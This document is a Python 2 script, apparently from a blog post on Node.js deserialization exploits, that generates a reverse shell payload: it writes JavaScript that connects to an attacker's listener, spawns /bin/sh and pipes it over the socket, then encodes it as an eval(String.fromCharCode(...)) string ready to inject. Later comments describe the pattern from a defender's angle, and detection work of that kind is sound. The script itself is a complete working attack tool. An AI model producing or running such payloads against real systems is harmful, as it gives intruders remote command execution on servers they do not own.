Node.js反序列化利用Exp

#!/usr/bin/python
# Generator for encoded NodeJS reverse shells
# Based on the NodeJS reverse shell by Evilpacket
# https://github.com/evilpacket/node-shells/blob/master/node_revshell.js
# Onelineified and suchlike by infodox (and felicity, who sat on the keyboard)
# Insecurety Research (2013) - insecurety.net
#
# Review notes (defender's view): this is a Python 2 script (print statements).
# It makes no network connection itself; it only prints a single line of
# JavaScript of the form eval(String.fromCharCode(<comma-separated codes>)).
# That shape -- eval() wrapped around String.fromCharCode() -- plus, once
# decoded, require('net') together with require('child_process').spawn('/bin/sh')
# is the pattern to look for when inspecting untrusted serialized input (the
# context this page discusses) or application logs. The encoding is a plain
# char-code listing, not encryption: decoding is a single fromCharCode call.
import sys

# Exactly two positional arguments are required. The argument names in the
# usage string appear to have been stripped by the blog's HTML rendering
# (the literal is kept as published).
if len(sys.argv) != 3:
    print "Usage: %s  " % (sys.argv[0])
    sys.exit(0)

IP_ADDR = sys.argv[1]  # listener address, substituted verbatim into the JS below
PORT = sys.argv[2]     # listener port, kept as a string (it lands inside a JS string literal)


def charencode(string):
    """String.CharCode

    Return the decimal char codes of `string`, comma-separated -- i.e. the
    argument list for JavaScript's String.fromCharCode(). Non-ASCII input is
    passed through ord() unchanged; nothing is compressed or obfuscated
    beyond this listing.
    """
    encoded = ''
    for char in string:
        encoded = encoded + "," + str(ord(char))
    return encoded[1:]  # drop the leading comma added by the first iteration


print "[+] LHOST = %s" % (IP_ADDR)
print "[+] LPORT = %s" % (PORT)
# JavaScript body that gets encoded: opens a TCP socket via the 'net' module,
# spawns /bin/sh via child_process and pipes the socket to the shell's stdin
# and the shell's stdout/stderr back to the socket. The String.prototype.contains
# polyfill at the top is defined but never referenced by the rest of the body.
NODEJS_REV_SHELL = '''
var net = require('net');
var spawn = require('child_process').spawn;
HOST="%s";
PORT="%s";
TIMEOUT="5000";
if (typeof String.prototype.contains === 'undefined') { String.prototype.contains = function(it) { return this.indexOf(it) != -1; }; }
function c(HOST,PORT) {
    var client = new net.Socket();
    client.connect(PORT, HOST, function() {
        var sh = spawn('/bin/sh',[]);
        client.write("Connected!/n");
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
        sh.on('exit',function(code,signal){
          client.end("Disconnected!/n");
        });
    });
    client.on('error', function(e) {
        setTimeout(c(HOST,PORT), TIMEOUT);
    });
}
c(HOST,PORT);
''' % (IP_ADDR, PORT)
print "[+] Encoding"
PAYLOAD = charencode(NODEJS_REV_SHELL)
# The printed line is the complete artifact; its eval(String.fromCharCode(...))
# prefix is a stable string to match on in input validation and log review.
print "eval(String.fromCharCode(%s))" % (PAYLOAD)
